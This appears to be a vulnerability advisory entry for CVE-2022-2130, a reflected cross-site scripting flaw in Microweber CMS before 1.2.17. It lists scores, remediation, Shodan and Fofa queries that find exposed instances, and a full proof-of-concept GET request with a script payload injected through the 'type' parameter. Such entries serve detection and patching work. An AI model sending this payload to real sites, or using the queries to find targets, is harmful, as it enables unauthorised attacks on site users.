| Title | Microweber < 1.2.17 - Cross-Site Scripting |
|---|---|
| Author | ritikchaddha |
| Severity | Medium |
| Impact | Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft or account compromise. |
| Remediation | Upgrade Microweber CMS to version 1.2.17 or later to mitigate the Reflected XSS vulnerability (CVE-2022-2130). |
| CVSS Score | 6.1 |
| EPSS Score | 0.25773 |
| CVE ID | CVE-2022-2130 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:780351152http.html:"microweber" |
| Fofa Query | body="microweber"icon_hash=780351152 |
| Tags | cve cve2022 microweber xss vuln |
Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the ‘type’ parameter.
GET /editor_tools/module?type=%22%3E%3Cdiv%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/15.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2130.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-2130.pcap
N/AN/A